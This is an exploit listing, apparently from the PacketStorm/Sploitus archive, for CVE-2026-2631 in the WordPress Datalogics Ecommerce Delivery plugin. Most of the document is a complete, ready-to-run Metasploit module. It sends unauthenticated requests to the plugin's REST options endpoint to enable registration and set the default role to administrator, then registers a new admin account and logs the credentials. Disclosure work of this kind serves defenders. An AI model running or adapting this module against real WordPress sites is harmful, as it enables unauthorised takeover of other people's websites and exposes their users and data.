Share
## https://sploitus.com/exploit?id=PACKETSTORM:218136
===============================================================================================================================================================================
| # Title : WordPress Datalogics Ecommerce Delivery Plugin < 2.6.60 Privilege Escalation via Insecure Configuration Manipulation Leading to Admin Account Creation |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://fr.wordpress.org/plugins/datalogics/ |
================================================================================================================================================================================
[+] Summary : A critical vulnerability exists in the Datalogics Ecommerce Delivery WordPress plugin versions prior to 2.6.60, allowing unauthenticated attackers to modify
sensitive plugin and WordPress configuration options due to insufficient access control in the exposed REST API.
The flaw enables attackers to enable user registration, change the default user role to administrator, and leverage the public registration mechanism to create an administrative account.
This results in a full privilege escalation chain, ultimately leading to complete takeover of affected WordPress installations.
The issue is caused by improper authentication and authorization checks on configuration update endpoints, exposing critical administrative functionality to unauthenticated users.
[+] POC :
##
# CVE-2026-2631
# Datalogics Ecommerce Delivery < 2.6.60 Privilege Escalation
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HTTP::Wordpress
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(
update_info(
info,
'Name' => 'WordPress Datalogics Ecommerce Delivery Privilege Escalation',
'Description' => %q{
This module exploits an unauthenticated privilege escalation vulnerability
in the Datalogics Ecommerce Delivery plugin (< 2.6.60).
The API allows insecure modification of WordPress options without authentication,
enabling attackers to:
1. Enable user registration
2. Set default role to administrator
3. Create a new admin account via public registration flow
},
'Author' => [
'indoushka'
],
'License' => MSF_LICENSE,
'References' => [
[ 'CVE', 'CVE-2026-2631' ]
],
'DisclosureDate' => '2026-01-01',
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [CONFIG_CHANGES]
}
)
)
register_options([
OptString.new('USERNAME', [true, 'Admin username', 'admin_poc']),
OptString.new('EMAIL', [true, 'Admin email', 'admin@poc.local']),
OptString.new('PASSWORD', [true, 'Admin password', 'P@ssw0rd123']),
OptString.new('TARGETURI', [true, 'WordPress base path', '/'])
])
end
def run_host(ip)
@uri = normalize_uri(target_uri.path)
print_status("Target: #{rhost}:#{rport}#{@uri}")
unless enable_registration
print_error("Failed to enable registration")
return
end
unless set_default_role
print_error("Failed to set default role")
return
end
if register_admin
print_good("Admin account created successfully!")
report_cred(
ip: rhost,
port: rport,
service_name: 'wordpress',
user: datastore['USERNAME'],
password: datastore['PASSWORD'],
proof: "Admin created via Datalogics exploit"
)
else
print_error("Exploitation failed")
end
end
def enable_registration
uri = normalize_uri(@uri, 'wp-json', 'datalogics', 'v1', 'options')
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'ctype' => 'application/json',
'data' => {
'users_can_register' => 1
}.to_json
})
res && res.code == 200
end
def set_default_role
uri = normalize_uri(@uri, 'wp-json', 'datalogics', 'v1', 'options')
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'ctype' => 'application/json',
'data' => {
'default_role' => 'administrator'
}.to_json
})
res && res.code == 200
end
def register_admin
uri = normalize_uri(@uri, 'wp-login.php?action=register')
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'ctype' => 'application/x-www-form-urlencoded',
'vars_post' => {
'user_login' => datastore['USERNAME'],
'user_email' => datastore['EMAIL'],
'user_pass' => datastore['PASSWORD']
}
})
res && res.code == 200
end
def report_cred(opts)
service_data = {
address: opts[:ip],
port: opts[:port],
service_name: opts[:service_name],
protocol: 'tcp'
}
credential_data = {
origin_type: :service,
module_fullname: self.fullname,
username: opts[:user],
private_data: opts[:password],
private_type: :password,
proof: opts[:proof]
}.merge(service_data)
create_credential_login({
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::SUCCESSFUL
})
end
end
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================